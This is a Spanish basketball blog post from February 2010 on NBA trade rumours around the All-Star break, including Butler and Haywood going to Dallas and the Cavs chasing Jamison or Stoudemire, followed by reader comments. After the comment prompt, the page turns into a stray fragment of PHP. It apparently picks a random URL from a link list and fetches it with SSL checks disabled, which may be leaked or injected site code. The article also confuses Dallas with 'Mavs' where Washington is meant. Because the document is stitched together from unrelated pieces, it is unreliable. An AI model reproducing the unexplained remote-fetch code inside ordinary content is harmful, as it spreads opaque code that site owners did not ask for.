Rumores de All Stars: Desmantelando Washington

14 de February de 2010 por Love Denise

El parón liguero propiciado por la disputa del All-Star siempre ha sido un buen momento para que los General Managers se reúnan, debatan y acuerdan traspasos. Este año no podía ser menos, y los primeros traspasos ya están a la vuelta de la esquina.

Aunque no está confirmado oficialmente ni por la NBA ni por los equipos interesados, el intercambio entre Dallas y Mavs está muy avanzado y se espera que el trade se oficialice en las próximas horas. En él, Caron Butler, Deshawn Stevenson y Brendan Haywood irían rumbo a Dallas, a cambio de Josh Howard (que acaba contrato), Drew Gooden y Quinton Ross. Con este trade, los Mavs aumentan considerablemente el potencial de su plantilla, consiguiendo un líder nato como Butler, un buen defensor como Stevenson, y un excelente pivot como Haywood tras el frustrado fichaje de Gortat en verano, confirmándose como la principal alternativa a los Lakers en el Oeste.

Por su parte, los Cavs están buscando un hombre alto que les refuerce especialmente en ataque, ya que todos conocemos las debilidades en ataque de Varejao, y la mediocre temporada de Ilgauskas. En Cleveland barajan tres opciones: Antawn Jamison, Amare Stoudemire y como último plato Troy Murphy. Lebron James ha pedido expresamente el fichaje de Jamison a los Cavs. Éstos ofrecerían a J.J. Hickson y a Wally Szczerbiak que podría ser comprado nuevamente por 8 millones de dólares exclusivamente para permitir que Jamison llegue a Cleveland. Otra opción que se baraja es la de Jamison por Ilgauskas. Por si este trade no se lleva a cabo, los Cavs están manteniendo conversaciones con Phoenix para adquirir a Stoudemire a cambio de Ilgauskas y Hickson, por lo que podríamos ver nuevamente a Amare y a O’Neal compartiendo la pintura.

Los Blazers también buscan un hombre alto que refuerce las posiciones interiores del equipo tras las lesiones sufridas por Oden y Przybilla, y podrían ofrecer a Blake o a Outlaw más alguna ronda de draft por Tyrus Thomas, del cual, andan como locos en Chicago por traspasarlo.

Otros posibles trades serían los que involucran a Hawks y a Bucks, que llevarían al veterano Kurt Thomas a Atlanta a cambio de Maurice Evans y Randolph Morris; y Ronnie Brewer llegaría a Memphis a cambio de la primera ronda del draft de los Ositos.

La noticia desagradable del día la ha protagonizado el escolta del Unicaja de Málaga Juan Dixon, ex de Wizards, Blazers y Raptors, que ha dado positivo por nandrolona en un control realizado el 5 de noviembre cuando militaba en el Aris de Salónica. Nada más conocer esta noticia, Unicaja ha apartado al jugador “hasta que la FIBA adopte una decisión definitiva sobre este asunto”.

Comenta

7 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Oneal y Stoudamire en el mismo equipo… otra vez. No me lo creo.

    De Dixon… fijáos si tendré ni puñetera idea acerca del potencial de jugadores NCAA que mis últimos “ojitos derechos” fueron Battier y Dixon. A partir de ahí dejó de interesarme la competición (si es que alguna vez despertó mi interés)

    Por cierto… que hoy estaré sí o sí con Txusma aunque me caiga de sueño…

      Citar

  2. Dantley2 dice:
    #2

    Confirmado lo de Dallas. Se pone esto interesante

      Citar

  3. Love Denise dice:
    #3

    Añadir que James Singleton también va a Wizards en el traspaso, y que se dice que Drew Gooden va a Washington para ser cortado y volver a Dallas. Creo que con este trade los Mavs deberían ser como mínimo finalistas en el Oeste, y darle un buen susto a los Lakers. Se les queda un equipo con el quinteto Kidd-Butler-Marion-Nowitzki-Haywood y un aceptable banquillo (igual o mejor que el de Lakers) con Barea, Terry, Stevenson, Thomas y Dampier.

      Citar

  4. sergio dice:
    #4

    Lo de los Wizards estaba cantado que debían comenzar con la reconstrucción. Creo que es el único equipo junto a Indiana y Houston sin representación en el All-Star (lo dijo Daimiel ayer y creo que son esos los equipos).

    Yo no daría como finalistas en el Oeste a Mavs. Aunque es un traspaso que refuerza muchísimo su plantel, aún hay equipos como Denver y Spurs que están formados por tremendos jugadores y más acostumbrados a las victorias que en Mavs, eterno “pupas” del campeonato. Haywood es un gran defensor para el puesto de pívot, quizás la posición en la que más flaqueaba el equipo, pero sigo viendo al equipo en franca desventaja ante juegos interiores como Gasol-Bynum o Duncan-Blair (creo que DeJuan va a ver sus minutos aumentados en las eliminatorias) e incluso un Carmelo- Nenê podría ponerlos en serios aprietos por la movilidad de Anthony. Quizás veo como un mejor fichaje para el equipo a Butler que, aparte de su indudable calidad, es un jugador menos temperamental y de rachas que Terry, amén de que su físico es superior al de John o Barea.

    Las dudas de los Mavs me las sigue ofreciendo el rendimiento de Kidd y Marion. Está por ver cuá de sus dos caras mostrarán cuando se decida el título…

    Desde luego si los Mavs no ganan un anillo no será porque Cuban no pone de su parte en los traspasos…

      Citar

  5. pcerezo dice:
    #5

    Por mi parte muchas dudas en Kidd, Butler y Haywood a nivel alto. Veo mejor equipo a Lakers y Denver e incluso Jazz y Spurs. Veremos…

    Si Cavs cierran lo de Jamison puede ser tremendo…

    Un saludo,
    Pablo

      Citar

  6. arivas dice:
    #6

    Yo tambien creo que si los Cavs consiguen a Jaimison o a Amare dan un paso muy muy grande, especialmente con las dudas de los Celtics.

    En el oeste pues a mi sí me parece un gran movimiento para Dallas, veremos como se adaptan, pero yo creo que pueden dar mas de un susto a cualquiera.

      Citar

  7. Tobal dice:
    #7

    Yo creo que Dallas se refuerza bien,con un gran anotador como Caron Butler,un pivot defensivo e intimidador como Brendan Haywood y un escolta defensivo como Stevenson,pero creo que es un error que metan en el traspaso a Gooden que estaba haciendo buenos partidos en Dallas,alguno de ellos con dobles figuras en puntos y rebotes.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>